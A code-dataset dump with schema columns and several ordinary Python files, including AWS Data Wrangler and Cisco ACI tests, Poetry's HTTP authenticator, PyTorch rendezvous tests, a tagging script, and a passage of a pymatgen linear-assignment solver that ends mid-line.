hexsha
stringlengths
40
40
size
int64
1
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
239
max_stars_repo_name
stringlengths
5
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
239
max_issues_repo_name
stringlengths
5
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
239
max_forks_repo_name
stringlengths
5
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.03M
avg_line_length
float64
1
958k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
795a70c0755c376feba74697bf3491d3bb6d58e8
15,826
py
Python
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
1
2020-11-10T12:37:08.000Z
2020-11-10T12:37:08.000Z
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
null
null
null
tests/test_athena_csv.py
ibanmarco/aws-data-wrangler
e99937296075c671e5f8a0998b430879c808687d
[ "Apache-2.0" ]
null
null
null
import logging import time import boto3 import pandas as pd import pytest import awswrangler as wr from ._utils import ensure_data_types_csv, get_df_csv logging.getLogger("awswrangler").setLevel(logging.DEBUG) @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_to_csv_modes(glue_database, glue_table, path, use_threads, concurrent_partitioning): # Round 1 - Warm up df = pd.DataFrame({"c0": [0, 1]}, dtype="Int64") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, description="c0", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index))}, columns_comments={"c0": "0"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df.shape == df2.shape assert df.c0.sum() == df2.c0.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c0" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "0" # Round 2 - Overwrite df = pd.DataFrame({"c1": [0, 1, 2]}, dtype="Int16") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, description="c1", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index))}, columns_comments={"c1": "1"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df.shape == df2.shape assert df.c1.sum() == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c1"] == "1" # Round 3 - Append df = pd.DataFrame({"c1": [0, 1, 2]}, dtype="Int8") paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="append", database=glue_database, table=glue_table, description="c1", parameters={"num_cols": str(len(df.columns)), "num_rows": str(len(df.index) * 2)}, columns_comments={"c1": "1"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df.columns) == len(df2.columns) assert len(df.index) * 2 == len(df2.index) assert df.c1.sum() + 3 == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == str(len(df2.columns)) assert parameters["num_rows"] == str(len(df2.index)) assert wr.catalog.get_table_description(glue_database, glue_table) == "c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c1"] == "1" # Round 4 - Overwrite Partitioned df = pd.DataFrame({"c0": ["foo", "boo"], "c1": [0, 1]}) paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite", database=glue_database, table=glue_table, partition_cols=["c1"], description="c0+c1", parameters={"num_cols": "2", "num_rows": "2"}, columns_comments={"c0": "zero", "c1": "one"}, use_threads=use_threads, concurrent_partitioning=concurrent_partitioning, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df.shape == df2.shape assert df.c1.sum() == df2.c1.sum() parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == "2" assert parameters["num_rows"] == "2" assert wr.catalog.get_table_description(glue_database, glue_table) == "c0+c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "zero" assert comments["c1"] == "one" # Round 5 - Overwrite Partitions df = pd.DataFrame({"c0": ["bar", "abc"], "c1": [0, 2]}) paths = wr.s3.to_csv( df=df, path=path, dataset=True, mode="overwrite_partitions", database=glue_database, table=glue_table, partition_cols=["c1"], description="c0+c1", parameters={"num_cols": "2", "num_rows": "3"}, columns_comments={"c0": "zero", "c1": "one"}, concurrent_partitioning=concurrent_partitioning, use_threads=use_threads, index=False, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.columns) == 2 assert len(df2.index) == 3 assert df2.c1.sum() == 3 parameters = wr.catalog.get_table_parameters(glue_database, glue_table) assert len(parameters) >= 5 assert parameters["num_cols"] == "2" assert parameters["num_rows"] == "3" assert wr.catalog.get_table_description(glue_database, glue_table) == "c0+c1" comments = wr.catalog.get_columns_comments(glue_database, glue_table) assert len(comments) == len(df.columns) assert comments["c0"] == "zero" assert comments["c1"] == "one" @pytest.mark.parametrize("use_threads", [True, False]) def test_csv_overwrite_several_partitions(path, glue_database, glue_table, use_threads): df0 = pd.DataFrame({"id": list(range(27)), "par": list(range(27))}) df1 = pd.DataFrame({"id": list(range(26)), "par": list(range(26))}) for df in (df0, df1): paths = wr.s3.to_csv( df=df, path=path, index=False, use_threads=use_threads, dataset=True, partition_cols=["par"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=True, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert df2.shape == df.shape assert df2["id"].sum() == df["id"].sum() assert df2["par"].sum() == df["par"].sum() def test_csv_dataset(path, glue_database): with pytest.raises(wr.exceptions.UndetectedType): wr.s3.to_csv(pd.DataFrame({"A": [None]}), path, dataset=True, database=glue_database, table="test_csv_dataset") df = get_df_csv() with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df, path + "0", dataset=False, mode="overwrite", database=glue_database, table="test_csv_dataset") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df, path + "0", dataset=False, table="test_csv_dataset") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", mode="append") with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", partition_cols=["col2"]) with pytest.raises(wr.exceptions.InvalidArgumentCombination): wr.s3.to_csv(df=df, path=path + "0", description="foo") with pytest.raises(wr.exceptions.InvalidArgumentValue): wr.s3.to_csv(df=df, path=path + "0", partition_cols=["col2"], dataset=True, mode="WRONG") paths = wr.s3.to_csv( df=df, path=path, sep="|", index=False, use_threads=True, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", )["paths"] wr.s3.wait_objects_exist(paths=paths) df2 = wr.s3.read_csv(path=paths, sep="|", header=None) assert len(df2.index) == 3 assert len(df2.columns) == 8 assert df2[0].sum() == 6 wr.s3.delete_objects(path=paths) @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_csv_catalog(path, glue_table, glue_database, use_threads, concurrent_partitioning): df = get_df_csv() paths = wr.s3.to_csv( df=df, path=path, sep="\t", index=True, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths) df2 = wr.athena.read_sql_table(glue_table, glue_database) assert len(df2.index) == 3 assert len(df2.columns) == 11 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) wr.s3.delete_objects(path=paths) assert wr.catalog.delete_table_if_exists(database=glue_database, table=glue_table) is True @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("concurrent_partitioning", [True, False]) def test_csv_catalog_columns(path, glue_database, glue_table, use_threads, concurrent_partitioning): paths = wr.s3.to_csv( df=get_df_csv(), path=path, sep="|", columns=["id", "date", "timestamp", "par0", "par1"], index=False, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.index) == 3 assert len(df2.columns) == 5 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) paths = wr.s3.to_csv( df=pd.DataFrame({"id": [4], "date": [None], "timestamp": [None], "par0": [1], "par1": ["a"]}), path=path, sep="|", index=False, use_threads=use_threads, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite_partitions", table=glue_table, database=glue_database, concurrent_partitioning=concurrent_partitioning, )["paths"] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads) assert len(df2.index) == 3 assert len(df2.columns) == 5 assert df2["id"].sum() == 9 ensure_data_types_csv(df2) def test_athena_csv_types(path, glue_database, glue_table): df = get_df_csv() paths = wr.s3.to_csv( df=df, path=path, sep=",", index=False, use_threads=True, boto3_session=None, s3_additional_kwargs=None, dataset=True, partition_cols=["par0", "par1"], mode="overwrite", )["paths"] wr.s3.wait_objects_exist(paths=paths) columns_types, partitions_types = wr.catalog.extract_athena_types( df=df, index=False, partition_cols=["par0", "par1"], file_format="csv" ) wr.catalog.create_csv_table( table=glue_table, database=glue_database, path=path, partitions_types=partitions_types, columns_types=columns_types, ) columns_types["col0"] = "string" with pytest.raises(wr.exceptions.InvalidArgumentValue): wr.catalog.create_csv_table( database=glue_database, table=glue_table, path=path, columns_types=columns_types, mode="append" ) wr.athena.repair_table(glue_table, glue_database) assert len(wr.catalog.get_csv_partitions(glue_database, glue_table)) == 3 df2 = wr.athena.read_sql_table(glue_table, glue_database) assert len(df2.index) == 3 assert len(df2.columns) == 10 assert df2["id"].sum() == 6 ensure_data_types_csv(df2) wr.s3.delete_objects(path=paths) assert wr.catalog.delete_table_if_exists(database=glue_database, table=glue_table) is True @pytest.mark.parametrize("use_threads", [True, False]) @pytest.mark.parametrize("ctas_approach", [True, False]) def test_skip_header(path, glue_database, glue_table, use_threads, ctas_approach): df = pd.DataFrame({"c0": [1, 2], "c1": [3.3, 4.4], "c2": ["foo", "boo"]}) df["c0"] = df["c0"].astype("Int64") df["c2"] = df["c2"].astype("string") paths = wr.s3.to_csv(df=df, path=f"{path}0.csv", sep=",", index=False, header=True, use_threads=use_threads)[ "paths" ] wr.s3.wait_objects_exist(paths=paths, use_threads=use_threads) wr.catalog.create_csv_table( database=glue_database, table=glue_table, path=path, columns_types={"c0": "bigint", "c1": "double", "c2": "string"}, skip_header_line_count=1, ) df2 = wr.athena.read_sql_table(glue_table, glue_database, use_threads=use_threads, ctas_approach=ctas_approach) assert df.equals(df2) @pytest.mark.parametrize("use_threads", [True, False]) def test_empty_column(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3], "c1": [None, None, None], "par": ["a", "b", "c"]}) df["c0"] = df["c0"].astype("Int64") df["par"] = df["par"].astype("string") with pytest.raises(wr.exceptions.UndetectedType): wr.s3.to_csv( df, path, index=False, dataset=True, table=glue_table, database=glue_database, partition_cols=["par"] ) @pytest.mark.parametrize("use_threads", [True, False]) def test_mixed_types_column(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3], "c1": [1, 2, "foo"], "par": ["a", "b", "c"]}) df["c0"] = df["c0"].astype("Int64") df["par"] = df["par"].astype("string") with pytest.raises(TypeError): wr.s3.to_csv( df, path, index=False, dataset=True, table=glue_table, database=glue_database, partition_cols=["par"] ) @pytest.mark.parametrize("use_threads", [True, False]) def test_failing_catalog(path, glue_table, glue_database, use_threads): df = pd.DataFrame({"c0": [1, 2, 3]}) try: wr.s3.to_csv(df, path, dataset=True, table=glue_table, database="foo") except boto3.client("glue").exceptions.EntityNotFoundException: pass time.sleep(3) assert len(wr.s3.list_objects(path)) == 0
39.368159
119
0.652913
795a71555e363945b36c3696a00672c22fc516a3
3,978
py
Python
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
1
2021-12-15T22:45:14.000Z
2021-12-15T22:45:14.000Z
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
null
null
null
cisco_aci/tests/test_cisco.py
tcpatterson/integrations-core
3692601de09f8db60f42612b0d623509415bbb53
[ "BSD-3-Clause" ]
null
null
null
# (C) Datadog, Inc. 2010-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import os from copy import deepcopy import pytest from mock import MagicMock from datadog_checks.base import AgentCheck from datadog_checks.base.utils.containers import hash_mutable from datadog_checks.cisco_aci import CiscoACICheck from datadog_checks.cisco_aci.api import Api, SessionWrapper from . import common def test_cisco(aggregator): cisco_aci_check = CiscoACICheck(common.CHECK_NAME, {}, [common.CONFIG]) api = Api(common.ACI_URLS, cisco_aci_check.http, common.USERNAME, password=common.PASSWORD, log=cisco_aci_check.log) api.wrapper_factory = common.FakeSessionWrapper cisco_aci_check._api_cache[hash_mutable(common.CONFIG)] = api cisco_aci_check.check({}) @pytest.mark.parametrize( ' api_kwargs', [ pytest.param({'password': common.PASSWORD}, id='login with password'), pytest.param( {'cert_name': 'foo', 'cert_key': open(os.path.join(common.CERTIFICATE_DIR, 'cert.pem'), 'rb').read()}, id='login with cert', ), ], ) def test_recover_from_expired_token(aggregator, api_kwargs): # First api answers with 403 to force the check to re-authenticate unauthentified_response = MagicMock(status_code=403) # Api answer when a request is being made to the login endpoint login_response = MagicMock() # Third api answer, when the check retries the initial endpoint but is now authenticated valid_response = MagicMock() valid_response.json = MagicMock(return_value={"foo": "bar"}) http = MagicMock() http.post = MagicMock(side_effect=[login_response]) http.get = MagicMock(side_effect=[unauthentified_response, valid_response]) session_wrapper = SessionWrapper(aci_url=common.ACI_URL, http=http, log=MagicMock()) session_wrapper.apic_cookie = "cookie" api = Api(common.ACI_URLS, http, common.USERNAME, **api_kwargs) api.sessions = {common.ACI_URL: session_wrapper} data = api.make_request("") # Assert that we retrieved the value from `valid_response.json()` assert data == {"foo": "bar"} get_calls = http.get._mock_call_args_list post_calls = http.post._mock_call_args_list # Assert that the first call was to the ACI_URL assert get_calls[0].args[0] == common.ACI_URL if 'password' in api_kwargs: # Assert that the second call was to the login endpoint assert 'aaaLogin.xml' in post_calls[0].args[0] # Assert that the last call was to the ACI_URL again assert get_calls[1].args[0] == common.ACI_URL # Assert session correctly renewed assert len(api.sessions) == 1 # check the number of sessions doesn't grow assert api.sessions[common.ACI_URL] != session_wrapper # check session renewed # Assert cookie to check the session changed assert get_calls[0].kwargs['headers']['Cookie'] == 'cookie' assert get_calls[1].kwargs['headers']['Cookie'] != 'cookie' @pytest.mark.parametrize( 'extra_config, expected_http_kwargs', [ pytest.param({'pwd': 'foobar'}, {'auth': (common.USERNAME, 'foobar'), 'verify': True}, id='new auth config'), pytest.param({'ssl_verify': True}, {'verify': True}, id='legacy ssl verify config True'), pytest.param({'ssl_verify': False}, {'verify': False}, id='legacy ssl verify config False'), ], ) def test_config(aggregator, extra_config, expected_http_kwargs): instance = deepcopy(common.CONFIG_WITH_TAGS) instance.update(extra_config) check = CiscoACICheck(common.CHECK_NAME, {}, [instance]) actual_options = {k: v for k, v in check.http.options.items() if k in expected_http_kwargs} assert expected_http_kwargs == actual_options @pytest.mark.e2e def test_e2e(dd_agent_check, aggregator, instance): with pytest.raises(Exception): dd_agent_check(instance) aggregator.assert_service_check("cisco_aci.can_connect", AgentCheck.CRITICAL)
38.25
120
0.718451
795a72719f66509be114338cc84f7f1949caff8e
4,381
py
Python
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
1
2020-08-19T19:51:22.000Z
2020-08-19T19:51:22.000Z
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
null
null
null
poetry/installation/authenticator.py
noamraph/poetry
0d48fb669e42d2b662b8e0abef6af8c8bb9ab68a
[ "MIT" ]
1
2021-11-16T13:29:42.000Z
2021-11-16T13:29:42.000Z
from typing import TYPE_CHECKING from poetry.utils._compat import urlparse from poetry.utils.password_manager import PasswordManager if TYPE_CHECKING: from typing import Any from typing import Optional from typing import Tuple from clikit.api.io import IO from requests import Request # noqa from requests import Response # noqa from requests import Session # noqa from poetry.config.config import Config class Authenticator(object): def __init__(self, config, io): # type: (Config, IO) -> None self._config = config self._io = io self._session = None self._credentials = {} self._password_manager = PasswordManager(self._config) @property def session(self): # type: () -> Session from requests import Session # noqa if self._session is None: self._session = Session() return self._session def request(self, method, url, **kwargs): # type: (str, str, Any) -> Response from requests import Request # noqa from requests.auth import HTTPBasicAuth request = Request(method, url) username, password = self._get_credentials_for_url(url) if username is not None and password is not None: request = HTTPBasicAuth(username, password)(request) session = self.session prepared_request = session.prepare_request(request) proxies = kwargs.get("proxies", {}) stream = kwargs.get("stream") verify = kwargs.get("verify") cert = kwargs.get("cert") settings = session.merge_environment_settings( prepared_request.url, proxies, stream, verify, cert ) # Send the request. send_kwargs = { "timeout": kwargs.get("timeout"), "allow_redirects": kwargs.get("allow_redirects", True), } send_kwargs.update(settings) resp = session.send(prepared_request, **send_kwargs) resp.raise_for_status() return resp def _get_credentials_for_url( self, url ): # type: (str) -> Tuple[Optional[str], Optional[str]] parsed_url = urlparse.urlsplit(url) netloc = parsed_url.netloc credentials = self._credentials.get(netloc, (None, None)) if credentials == (None, None): if "@" not in netloc: credentials = self._get_credentials_for_netloc_from_config(netloc) else: # Split from the right because that's how urllib.parse.urlsplit() # behaves if more than one @ is present (which can be checked using # the password attribute of urlsplit()'s return value). auth, netloc = netloc.rsplit("@", 1) if ":" in auth: # Split from the left because that's how urllib.parse.urlsplit() # behaves if more than one : is present (which again can be checked # using the password attribute of the return value) credentials = auth.split(":", 1) else: credentials = auth, None credentials = tuple( None if x is None else urlparse.unquote(x) for x in credentials ) if credentials[0] is not None or credentials[1] is not None: credentials = (credentials[0] or "", credentials[1] or "") self._credentials[netloc] = credentials return credentials[0], credentials[1] def _get_credentials_for_netloc_from_config( self, netloc ): # type: (str) -> Tuple[Optional[str], Optional[str]] credentials = (None, None) for repository_name in self._config.get("http-basic", {}): repository_config = self._config.get( "repositories.{}".format(repository_name) ) if not repository_config: continue url = repository_config.get("url") if not url: continue parsed_url = urlparse.urlsplit(url) if netloc == parsed_url.netloc: auth = self._password_manager.get_http_auth(repository_name) if auth is None: continue return auth["username"], auth["password"] return credentials
32.69403
87
0.594157
795a72a1bfbdb03846e4796f5c3981f409050717
3,358
py
Python
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
60,067
2017-01-18T17:21:31.000Z
2022-03-31T21:37:45.000Z
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
66,955
2017-01-18T17:21:38.000Z
2022-03-31T23:56:11.000Z
test/distributed/elastic/rendezvous/rendezvous_backend_test.py
Hacky-DH/pytorch
80dc4be615854570aa39a7e36495897d8a040ecc
[ "Intel" ]
19,210
2017-01-18T17:45:04.000Z
2022-03-31T23:51:56.000Z
# Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. from abc import ABC, abstractmethod from typing import Any, Callable, Optional, Tuple, cast from torch.distributed.elastic.rendezvous import RendezvousStateError from torch.distributed.elastic.rendezvous.dynamic_rendezvous import RendezvousBackend, Token class RendezvousBackendTestMixin(ABC): _backend: RendezvousBackend # Type hints assertEqual: Callable assertNotEqual: Callable assertIsNone: Callable assertIsNotNone: Callable assertRaises: Callable @abstractmethod def _corrupt_state(self) -> None: """Corrupts the state stored in the backend.""" pass def _set_state(self, state: bytes, token: Optional[Any] = None) -> Tuple[bytes, Token, bool]: result = self._backend.set_state(state, token) self.assertIsNotNone(result) return cast(Tuple[bytes, Token, bool], result) def test_get_state_returns_backend_state(self) -> None: self._backend.set_state(b"x") result = self._backend.get_state() self.assertIsNotNone(result) state, token = cast(Tuple[bytes, Token], result) self.assertEqual(b"x", state) self.assertIsNotNone(token) def test_get_state_returns_none_if_backend_state_does_not_exist(self) -> None: result = self._backend.get_state() self.assertIsNone(result) def test_get_state_raises_error_if_backend_state_is_corrupt(self) -> None: self._corrupt_state() with self.assertRaises(RendezvousStateError): self._backend.get_state() def test_set_state_sets_backend_state_if_it_does_not_exist(self) -> None: state, token, has_set = self._set_state(b"x") self.assertEqual(b"x", state) self.assertIsNotNone(token) self.assertTrue(has_set) def test_set_state_sets_backend_state_if_token_is_current(self) -> None: state1, token1, has_set1 = self._set_state(b"x") state2, token2, has_set2 = self._set_state(b"y", token1) self.assertEqual(b"y", state2) self.assertNotEqual(token1, token2) self.assertTrue(has_set1) self.assertTrue(has_set2) def test_set_state_returns_current_backend_state_if_token_is_old(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, _ = self._set_state(b"y", token1) state3, token3, has_set = self._set_state(b"z", token1) self.assertEqual(state2, state3) self.assertEqual(token2, token3) self.assertFalse(has_set) def test_set_state_returns_current_backend_state_if_token_is_none(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, has_set = self._set_state(b"y") self.assertEqual(state1, state2) self.assertEqual(token1, token2) self.assertFalse(has_set) def test_set_state_returns_current_backend_state_if_token_is_invalid(self) -> None: state1, token1, _ = self._set_state(b"x") state2, token2, has_set = self._set_state(b"y", token="invalid") self.assertEqual(state1, state2) self.assertEqual(token1, token2) self.assertFalse(has_set)
32.288462
97
0.699821
795a72e90423251835b9fbe90e8dcb4d5aec995b
269
py
Python
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
3
2020-08-02T04:46:18.000Z
2020-08-07T10:10:53.000Z
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
null
null
null
scripts/component_graph/far/__init__.py
opensource-assist/fuschia
66646c55b3d0b36aae90a4b6706b87f1a6261935
[ "BSD-3-Clause" ]
1
2020-08-07T10:11:49.000Z
2020-08-07T10:11:49.000Z
#!/usr/bin/env python3 # Copyright 2019 The Fuchsia Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """The FAR module provides support for parsing FAR files.""" import far.far_reader
29.888889
72
0.758364
795a74090d851905a6c18668ca7f8eee147d9a74
1,782
py
Python
pie/scripts/tag_pipe.py
lascivaroma/PaPie
260440d0ad27a853350bdc4cf2a77d1655e231f8
[ "MIT" ]
16
2019-01-17T08:15:41.000Z
2021-11-12T15:17:41.000Z
pie/scripts/tag_pipe.py
lascivaroma/PaPie
260440d0ad27a853350bdc4cf2a77d1655e231f8
[ "MIT" ]
64
2018-12-16T14:52:51.000Z
2021-05-20T07:58:40.000Z
pie/scripts/tag_pipe.py
datatjej/pie
0ca4311a57b2439994e5fcdc02f4d008ee268a9c
[ "MIT" ]
4
2019-03-29T14:35:02.000Z
2021-05-19T13:31:48.000Z
# Can be run with python -m pie.scripts.tag_pipe import sys from pie import utils from pie.tagger import Tagger, simple_tokenizer def run(model_spec, device, batch_size, lower, beam_width, use_beam, tokenize): with utils.shutup(): tagger = Tagger(device=device, batch_size=batch_size, lower=lower) for model, tasks in model_spec: tagger.add_model(model, *tasks) tasks = tasks or tagger.models[-1][0].label_encoder.tasks header = False for line in sys.stdin: if not line: continue if tokenize: line = simple_tokenizer(line, lower) else: line = line.split() preds, tasks = tagger.tag( [line], [len(line)], use_beam=use_beam, beam_width=beam_width) if not header: print('\t'.join(['token'] + tasks)) header = True preds = preds[0] # unpack tokens, tags = zip(*preds) for token, tags in zip(tokens, tags): print('\t'.join([token] + list(tags))) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('model_spec', type=utils.model_spec) parser.add_argument('--device', default='cpu') parser.add_argument('--use_beam', action='store_true') parser.add_argument('--batch_size', type=int, default=50) parser.add_argument('--beam_width', default=10, type=int) parser.add_argument('--lower', action='store_true') parser.add_argument('--tokenize', action='store_true') args = parser.parse_args() run(model_spec=args.model_spec, device=args.device, batch_size=args.batch_size, lower=args.lower, beam_width=args.beam_width, use_beam=args.use_beam, tokenize=args.tokenize)
33
79
0.640292
795a75671aa69e98d5c33cc93d7871e6af3e8895
7,504
py
Python
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
1
2022-02-28T04:24:46.000Z
2022-02-28T04:24:46.000Z
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
null
null
null
pymatgen/optimization/linear_assignment.py
miaoliu/pymatgen
fe3c48ce3334924e6693f857aebc64b9714d1af2
[ "MIT" ]
null
null
null
#!/usr/bin/env python """ This module contains an algorithm to solve the Linear Assignment Problem """ from __future__ import division __author__ = "Will Richards" __copyright__ = "Copyright 2011, The Materials Project" __version__ = "1.0" __maintainer__ = "Will Richards" __email__ = "wrichards@mit.edu" __date__ = "Jan 28, 2013" import numpy as np class LinearAssignment(object): """ This class finds the solution to the Linear Assignment Problem. It finds a minimum cost matching between two sets, given a cost matrix. This class is an implementation of the LAPJV algorithm described in: R. Jonker, A. Volgenant. A Shortest Augmenting Path Algorithm for Dense and Sparse Linear Assignment Problems. Computing 38, 325-340 (1987) .. attribute: min_cost: The minimum cost of the matching .. attribute: solution: The matching of the rows to columns. i.e solution = [1, 2, 0] would match row 0 to column 1, row 1 to column 2 and row 2 to column 0. Total cost would be c[0, 1] + c[1, 2] + c[2, 0] """ def __init__(self, costs, epsilon=-1e-6): """ Args: costs: The cost matrix of the problem. cost[i,j] should be the cost of matching x[i] to y[j]. The cost matrix must be square epsilon: tolerance for determining if solution vector is < 0 """ self.c = np.array(costs) self.n = len(costs) if epsilon < 0: self.epsilon = epsilon else: raise ValueError("epsilon must be negative") #check that cost matrix is square if self.c.shape != (self.n, self.n): raise ValueError("cost matrix is not square") #initialize solution vectors self._x = np.zeros(self.n, dtype=np.int) - 1 self._y = np.zeros(self.n, dtype=np.int) - 1 #if column reduction doesn't find a solution, augment with shortest #paths until one is found if self._column_reduction(): self._augmenting_row_reduction() #initialize the reduced costs self._update_cred() while np.min(self._x) < self.epsilon: self._augment() self.solution = self._x self._min_cost = None @property def min_cost(self): """ Returns the cost of the best assignment """ if self._min_cost: return self._min_cost self._min_cost = np.sum(self.c[np.arange(len(self.c)), self.solution]) return self._min_cost def _column_reduction(self): """ Column reduction and reduction transfer steps from LAPJV algorithm """ #assign each column to its lowest cost row, ensuring that only row #or column is assigned once i1, j = np.unique(np.argmin(self.c, axis=0), return_index=True) self._x[i1] = j #if problem is solved, return if len(i1) == self.n: return False self._y[j] = i1 #reduction_transfer #tempc is array with previously assigned matchings masked self._v = np.min(self.c, axis=0) tempc = self.c.copy() tempc[i1, j] = np.max(tempc.flatten()) * 10 mu = np.min(tempc[i1, :] - self._v[None, :], axis=1) self._v[j] -= mu return True def _augmenting_row_reduction(self): """ Augmenting row reduction step from LAPJV algorithm """ unassigned = np.where(self._x == -1)[0] for i in unassigned: while True: #find smallest 2 values and indices temp = self.c[i] - self._v j1 = 